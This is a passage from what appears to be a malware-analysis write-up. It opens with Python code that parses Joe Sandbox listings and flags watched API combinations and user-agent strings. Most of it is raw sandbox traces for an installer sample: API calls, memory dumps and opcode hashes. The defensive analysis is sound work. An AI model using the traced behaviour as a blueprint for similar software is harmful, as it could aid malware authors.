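    calls: List[ApiCall] = field(default_factory=list)
    fields: Dict[str, str] = field(default_factory=dict)

    @property
    def api_names(self) -> Set[str]:
        return {c.name for c in self.calls}

    @property
    def opcode_id(self) -> str:
        return self.fields.get("Opcode ID", "")


def parse(text: str) -> List[FunctionEntry]:
    """Split the listing at each 'APIs' header; collect API calls and key/value fields."""
    entries: List[FunctionEntry] = []
    current: Optional[FunctionEntry] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionEntry()
            entries.append(current)
            continue
        if current is None or not line.startswith("•"):
            continue  # headers such as 'Similarity' carry no data of their own
        m = API_RE.match(line)
        if m:
            args = m.group("args")
            current.calls.append(ApiCall(m.group("name"), m.group("mod"),
                                         args.split(",") if args else [],
                                         m.group("ref"), m.group("sub")))
            continue
        m = KV_RE.match(line)
        if m:
            current.fields[m.group("key")] = m.group("val").strip()
    return entries


def flag(entries: List[FunctionEntry]) -> List[Tuple[str, str]]:
    """(watch-list label, Opcode ID) for each entry whose API set covers a watched set."""
    return [(label, e.opcode_id) for e in entries
            for label, needed in WATCHLIST.items() if needed <= e.api_names]


def user_agents(entries: List[FunctionEntry]) -> List[str]:
    """First argument of InternetOpenW is the user-agent string the code will send."""
    return [c.args[0] for e in entries for c in e.calls
            if c.name == "InternetOpenW" and c.args]


if __name__ == "__main__":
    parsed = parse(SAMPLE)
    print(flag(parsed))
    print(user_agents(parsed))
```

The Opcode ID returned with each hit is the value to search for in other reports; the "Part of subcall function" lines are kept as calls with `subcall_of` set, so a match on a nested call still points at the enclosing function's hashes.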
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(ComCtl32.dll,C7BA013E,?,00000000,00000000), ref: 00963D6E
                                                                                                                        • GetProcAddress.KERNEL32(00000000,LoadIconMetric), ref: 00963D91
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00963E0F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                         • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                        • String ID: ComCtl32.dll$LoadIconMetric
                                                                                                                        • API String ID: 145871493-764666640
                                                                                                                        • Opcode ID: da989f7c99201169aea7dcce93212d3dd588925af5ce78ef14ed5107ce7a783c
                                                                                                                        • Instruction ID: 89c6ed8934fcab02dd0fe526777095c705831cc6155e8304d64724d1fa7c33ec
                                                                                                                        • Opcode Fuzzy Hash: da989f7c99201169aea7dcce93212d3dd588925af5ce78ef14ed5107ce7a783c
                                                                                                                        • Instruction Fuzzy Hash: 34314FB1A00259ABDF14CF95CC55BAFBBF8EB48754F10412AF915E7281DB758A048B90
                                                                                                                        APIs
                                                                                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 008596B0
                                                                                                                        • GetWindowLongW.USER32(?,000000FC), ref: 008596C5
                                                                                                                        • CallWindowProcW.USER32(?,?,00000082,?,?), ref: 008596DB
                                                                                                                        • GetWindowLongW.USER32(?,000000FC), ref: 008596F5
                                                                                                                        • SetWindowLongW.USER32(?,000000FC,?), ref: 00859705
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                         • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Long$CallProc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 513923721-0
                                                                                                                        • Opcode ID: 5156c01b111453c37f2fbc396b8761aad00a2a21aa8bcadf3dd3a76cffd0ee2c
                                                                                                                        • Instruction ID: 92393be1f86b9011067a456391ce895e504beeb07e911668c03d4e949de3dc5d
                                                                                                                        • Opcode Fuzzy Hash: 5156c01b111453c37f2fbc396b8761aad00a2a21aa8bcadf3dd3a76cffd0ee2c
                                                                                                                        • Instruction Fuzzy Hash: 6B211871204700AFC7219F19DC84817BBF5FF99761B108A2EF8EAC26A0D732E9459F50
                                                                                                                        APIs
                                                                                                                        • MsgWaitForMultipleObjectsEx.USER32(00000001,00000000,000000FF,000005FF,00000004), ref: 00961811
                                                                                                                        • PeekMessageW.USER32(?,00000000), ref: 00961857
                                                                                                                        • TranslateMessage.USER32(00000000), ref: 00961862
                                                                                                                        • DispatchMessageW.USER32(00000000), ref: 00961869
                                                                                                                        • MsgWaitForMultipleObjectsEx.USER32(00000001,?,000000FF,000005FF,00000004), ref: 0096187B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                         • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$MultipleObjectsWait$DispatchPeekTranslate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4084795276-0
                                                                                                                        • Opcode ID: badda8a4d7dbe0ebf0a3f616fdeb2050a83f2dabfb20242b8c4d313ffb9a2488
                                                                                                                        • Instruction ID: 0976e878bc7b0e4bdb8c553fca75ee659a612c0510d9eeaa1bd57a762ddf3152
                                                                                                                        • Opcode Fuzzy Hash: badda8a4d7dbe0ebf0a3f616fdeb2050a83f2dabfb20242b8c4d313ffb9a2488
                                                                                                                        • Instruction Fuzzy Hash: A1114C316443067AE620CB519D81FB777ECEB89774F540636FA10E70C0DB74E9858761
                                                                                                                        APIs
                                                                                                                        • ResetEvent.KERNEL32(?,?,?,00999442,?,?,?,?,?,00000003,00000000,C7BA013E,00000000), ref: 0099A022
                                                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,?), ref: 0099A045
                                                                                                                        • GetLastError.KERNEL32(?,?,?,00999442,?,?,?,?,?,00000003,00000000,C7BA013E,00000000), ref: 0099A04F
                                                                                                                        • WaitForSingleObject.KERNEL32(?,0000000A,?,?,?,00999442,?,?,?,?,?,00000003,00000000,C7BA013E,00000000), ref: 0099A085
                                                                                                                        • SetEvent.KERNEL32(?,?,?,?,00999442,?,?,?,?,?,00000003,00000000,C7BA013E,00000000), ref: 0099A0A8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                         • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Event$ConnectErrorInternetLastObjectResetSingleWait
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3866874665-0
                                                                                                                        • Opcode ID: ee18dcaeccb77caeefb6d7cc2b83679e76d4be89537976bb8a835a4fbec99de1
                                                                                                                        • Instruction ID: de11c46267dd699a3358ff04e0e85807f2045889915d9042e887625715694689
                                                                                                                        • Opcode Fuzzy Hash: ee18dcaeccb77caeefb6d7cc2b83679e76d4be89537976bb8a835a4fbec99de1
                                                                                                                        • Instruction Fuzzy Hash: E311A3312047408EEF319B6DD948B577BE9EFA2324F00482EE08382571D765EC96C791
                                                                                                                        APIs
                                                                                                                        • PathIsUNCW.SHLWAPI(?,C7BA013E,?,00000010,?), ref: 0098309A
                                                                                                                          • Part of subcall function 0095BF10: GetCurrentProcess.KERNEL32 ref: 0095BF58
                                                                                                                          • Part of subcall function 0095BF10: OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 0095BF65
                                                                                                                          • Part of subcall function 0095BF10: GetLastError.KERNEL32 ref: 0095BF6F
                                                                                                                          • Part of subcall function 0095BF10: CloseHandle.KERNEL32(00000000), ref: 0095C050
                                                                                                                          • Part of subcall function 0084ABE0: GetProcessHeap.KERNEL32 ref: 0084AC35
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084AC67
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084ACF2
                                                                                                                          • Part of subcall function 0084A190: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,00000000,0084A308,-00000010,?,00000000), ref: 0084A1B3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                         • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$Init_thread_footer$CloseCurrentErrorFindHandleHeapLastOpenPathResourceToken
                                                                                                                        • String ID: Extraction path set to:$[WindowsVolume]$\\?\
                                                                                                                        • API String ID: 699919280-3538578949
                                                                                                                        • Opcode ID: d6618884233df5ab06f17e50dc2e0878b85065e6c19b6ef1b55944c10906bed1
                                                                                                                        • Instruction ID: 26087d86aeb9390c974a89dde2b67a22878f9584bf7d80d8e6a081aba69ef8c4
                                                                                                                        • Opcode Fuzzy Hash: d6618884233df5ab06f17e50dc2e0878b85065e6c19b6ef1b55944c10906bed1
                                                                                                                        • Instruction Fuzzy Hash: 93C1A23090160A9BDB14EF6CC858BAEF7B5FF45714F1482A8E811EB392DB709E45CB91
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0097A850: GetTickCount.KERNEL32 ref: 0097A8D4
                                                                                                                          • Part of subcall function 0097A850: __Xtime_get_ticks.LIBCPMT ref: 0097A8DC
                                                                                                                          • Part of subcall function 0097A850: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0097A926
                                                                                                                          • Part of subcall function 0099F2B0: GetUserNameW.ADVAPI32(?,?), ref: 0099F345
                                                                                                                          • Part of subcall function 0099F2B0: GetLastError.KERNEL32 ref: 0099F34B
                                                                                                                          • Part of subcall function 0099F2B0: GetUserNameW.ADVAPI32(?,?), ref: 0099F393
                                                                                                                          • Part of subcall function 0099F2B0: GetEnvironmentVariableW.KERNEL32(UserDomain,00000000,00000000), ref: 0099F3C9
                                                                                                                          • Part of subcall function 0099F2B0: GetEnvironmentVariableW.KERNEL32(UserDomain,?,00000000,00000000,00000000), ref: 0099F413
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 0097AB11
                                                                                                                        • GetCurrentProcess.KERNEL32(00000008,?,C7BA013E), ref: 0097AD08
                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 0097AD0F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                         • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: EnvironmentNameProcessUserVariable$CountCurrentErrorInit_thread_footerLastOpenTickTokenUnothrow_t@std@@@Xtime_get_ticks__ehfuncinfo$??2@
                                                                                                                        • String ID: \/:*?"<>|
                                                                                                                        • API String ID: 1521599615-3830478854
                                                                                                                        • Opcode ID: a4a8311a8d2e6087b02b819d021cb2c7ca5f87644010b97553d34671cc0d75b2
                                                                                                                        • Instruction ID: 7faa3b9d1e426e6f870384d2015418029fd5108c1d7c81cf0e8513ad8a2c7a24
                                                                                                                        • Opcode Fuzzy Hash: a4a8311a8d2e6087b02b819d021cb2c7ca5f87644010b97553d34671cc0d75b2
                                                                                                                        • Instruction Fuzzy Hash: 55B10271D00208DFDB24DFA8C9457EEBBB5FF54304F248269E419AB291EB346E45CB92
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000080,00000000,C7BA013E,?,6C4B37E0), ref: 009B3692
                                                                                                                        • WriteFile.KERNEL32(?,?,00000008,00000008,00000000,?,6C4B37E0), ref: 009B3728
                                                                                                                        • CloseHandle.KERNEL32(?,?,6C4B37E0), ref: 009B379C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                         • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
Similarity
• API ID: File$CloseCreateHandleWrite
• String ID: 7Kl
• API String ID: 1065093856-1576159710
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,C7BA013E,?,00000010,?,0097DEC0,?), ref: 0097A5B6
• SetFilePointer.KERNEL32(00000000,?,00000010,00000000), ref: 0097A5FF
• ReadFile.KERNEL32(00000000,C7BA013E,?,?,00000000,00000078,?), ref: 0097A641
• CloseHandle.KERNEL32(00000000), ref: 0097A6BA
Similarity
• API ID: File$CloseCreateHandlePointerRead
• String ID:
• API String ID: 4133201480-0
APIs
• GetCurrentThreadId.KERNEL32 ref: 00982279
• DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A84460,000000FF), ref: 00982288
• PostMessageW.USER32(?,00000401,00000000,00000000), ref: 009822A6
• IsWindow.USER32(?), ref: 009822B5
Similarity
• API ID: Window$CurrentDestroyMessagePostThread
• String ID:
• API String ID: 3186974096-0
APIs
  • Part of subcall function 0084ABE0: GetProcessHeap.KERNEL32 ref: 0084AC35
  • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084AC67
  • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084ACF2
• PathIsUNCW.SHLWAPI(?,?,?,?,00000000,00000000,00A7F3AF,000000FF), ref: 00960D36
Similarity
• API ID: Init_thread_footer$HeapPathProcess
• String ID: \\?\$\\?\UNC\
• API String ID: 806983814-3019864461
APIs
• GetProcessHeap.KERNEL32(00000008,00000008,00000000,0098AB8E,?,?,?,?,?,?), ref: 00A15948
• HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?), ref: 00A1594F
• GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?), ref: 00A15995
• HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 00A1599C
  • Part of subcall function 00A157E1: GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,00A1598B,?,?,?,?,?,?,?), ref: 00A15805
  • Part of subcall function 00A157E1: HeapAlloc.KERNEL32(00000000,?,00A1598B,?,?,?,?,?,?,?), ref: 00A1580C
Similarity
• API ID: Heap$Process$Alloc$Free
• String ID:
• API String ID: 1864747095-0
APIs
• __freea.LIBCMT ref: 00A3034B
  • Part of subcall function 00A2E1F7: RtlAllocateHeap.NTDLL(00000000,00A35D4E,?,?,00A35D4E,00000220,?,?,?), ref: 00A2E229
• __freea.LIBCMT ref: 00A30360
• __freea.LIBCMT ref: 00A30370
Similarity
• API ID: __freea$AllocateHeap
• String ID:
• API String ID: 2243444508-0
APIs
• SetFilePointer.KERNEL32(?,?,?,00000000,C7BA013E,?,?), ref: 00985E57
• ReadFile.KERNEL32(?,00000000,00000018,?,00000000), ref: 00985F64
Similarity
• API ID: File$PointerRead
• String ID:
• API String ID: 3154509469-0
APIs
• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,C7BA013E,?,00000000,?,80004005,?,00000000), ref: 0098324E
• GetLastError.KERNEL32 ref: 00983286
• GetLastError.KERNEL32(?), ref: 0098331F
Similarity
• API ID: ErrorLast$CreateFile
• String ID:
• API String ID: 1722934493-0
APIs
  • Part of subcall function 0084ABE0: GetProcessHeap.KERNEL32 ref: 0084AC35
  • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084AC67
  • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084ACF2
• SHGetSpecialFolderPathW.SHELL32(00000000,?,00000025,00000000,C7BA013E), ref: 00961510
  • Part of subcall function 009615D0: GetEnvironmentVariableW.KERNEL32(00000000,00000000,00000000,?,?,?,80004005), ref: 009615DD
Strings
Memory Dump Source
• Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
Similarity
• API ID: Init_thread_footer$EnvironmentFolderHeapPathProcessSpecialVariable
• String ID: USERPROFILE
• API String ID: 1777821646-2419442777
APIs
• InterlockedPushEntrySList.KERNEL32(00B30AF0,00B30B48,Windows.UI.Xaml.Input.KeyboardAccelerator,00000029,C7BA013E,?,00AB0A34,?), ref: 0088E3A6
Strings
• Windows.UI.Xaml.Input.KeyboardAccelerator, xrefs: 0088E2FA
Memory Dump Source
• Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
Similarity
• API ID: EntryInterlockedListPush
• String ID: Windows.UI.Xaml.Input.KeyboardAccelerator
• API String ID: 4129690577-1815025733
Strings
• Windows.UI.Xaml.Controls.Grid, xrefs: 008A825A
Memory Dump Source
• Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
Similarity
• API ID:
• String ID: Windows.UI.Xaml.Controls.Grid
• API String ID: 0-2024751149
Strings
• Windows.UI.Xaml.Controls.Button, xrefs: 008A7FEA
Memory Dump Source
• Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
Similarity
• API ID:
• String ID: Windows.UI.Xaml.Controls.Button
• API String ID: 0-66595721
APIs
• InterlockedPushEntrySList.KERNEL32(00B30AF0,00B30C38,Windows.UI.Xaml.Media.Imaging.BitmapImage,00000029,C7BA013E,00000000,000000C8,?,00B30C34,00A3E897,000000FF), ref: 008A7268
Strings
• Windows.UI.Xaml.Media.Imaging.BitmapImage, xrefs: 008A71BA
Memory Dump Source
• Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
Similarity
• API ID: EntryInterlockedListPush
• String ID: Windows.UI.Xaml.Media.Imaging.BitmapImage
• API String ID: 4129690577-320498557
APIs
• InterlockedPushEntrySList.KERNEL32(00B30AF0,00B30B38,Windows.UI.Xaml.Documents.Run,0000001D,C7BA013E,00000000,000000B8,?,00B30B34,00A3E897,000000FF), ref: 0088DE58
Strings
• Windows.UI.Xaml.Documents.Run, xrefs: 0088DDAA
Memory Dump Source
• Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
Similarity
• API ID: EntryInterlockedListPush
• String ID: Windows.UI.Xaml.Documents.Run
• API String ID: 4129690577-4058747365
APIs
• InterlockedPushEntrySList.KERNEL32(00B30AF0,00B30C28,Windows.UI.Xaml.Controls.Image,0000001E,C7BA013E,00000000,000000B4,?,00B30C24,00A3E897,000000FF), ref: 008A6E28
Strings
• Windows.UI.Xaml.Controls.Image, xrefs: 008A6D7A
Memory Dump Source
• Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
Similarity
• API ID: EntryInterlockedListPush
• String ID: Windows.UI.Xaml.Controls.Image
• API String ID: 4129690577-940143292
APIs
  • Part of subcall function 00A162A2: EnterCriticalSection.KERNEL32(00B2FE4C,?,?,?,0084AC86,00B30A7C,C7BA013E,?,?,00A3E40D,000000FF,?,00985F11), ref: 00A162AD
  • Part of subcall function 00A162A2: LeaveCriticalSection.KERNEL32(00B2FE4C,?,?,?,0084AC86,00B30A7C,C7BA013E,?,?,00A3E40D,000000FF,?,00985F11), ref: 00A162EA
• __Init_thread_footer.LIBCMT ref: 00945572
  • Part of subcall function 00A16258: EnterCriticalSection.KERNEL32(00B2FE4C,?,?,0084ACF7,00B30A7C,00A9D9D0), ref: 00A16262
  • Part of subcall function 00A16258: LeaveCriticalSection.KERNEL32(00B2FE4C,?,0084ACF7,00B30A7C,00A9D9D0), ref: 00A16295
  • Part of subcall function 00A16258: RtlWakeAllConditionVariable.NTDLL ref: 00A1630C
Strings
Memory Dump Source
• Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                                                                                        • String ID: 5(I
                                                                                                                        • API String ID: 2296764815-2411506167
                                                                                                                        • Opcode ID: 4231034018271248a0d1028328f0f76a47f33cf6674e68a926035dc6c747c257
                                                                                                                        • Instruction ID: 95d2d03e16a7ffc505811206e39e98b785430ea751c534206458d2985e48fda3
                                                                                                                        • Opcode Fuzzy Hash: 4231034018271248a0d1028328f0f76a47f33cf6674e68a926035dc6c747c257
                                                                                                                        • Instruction Fuzzy Hash: 4F017CB1A44A44EBCB11DF98ED42B5973E4E709724F618769F816C37E1DA36AD008A06
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00A35A7A: GetOEMCP.KERNEL32(00000000,?,?,?,?), ref: 00A35AA5
                                                                                                                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00A35D91,?,00000000,?,?,?), ref: 00A35FAB
                                                                                                                        • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00A35D91,?,00000000,?,?,?), ref: 00A35FED
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CodeInfoPageValid
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 546120528-0
                                                                                                                        • Opcode ID: 6907d5516944d2ef3c02e0cc0b6dc75e4620c631d269d795b781cbe7795f5622
                                                                                                                        • Instruction ID: 175ab67a295be710de9f6e9a41646ebab0a02a12f01331e89a0a70ad95ec1929
                                                                                                                        • Opcode Fuzzy Hash: 6907d5516944d2ef3c02e0cc0b6dc75e4620c631d269d795b781cbe7795f5622
                                                                                                                        • Instruction Fuzzy Hash: 64512671E007456EDB25CF75C8826AABBF5EF46304F18C16EF0828B251E7759946CB90
                                                                                                                        APIs
                                                                                                                        • RegQueryValueExW.KERNEL32(?,?,00000000,000000C8,00000000,000000C8,000000C8), ref: 00993F1E
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000002,00000000,00000002,00000002,000000C8), ref: 00993F60
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
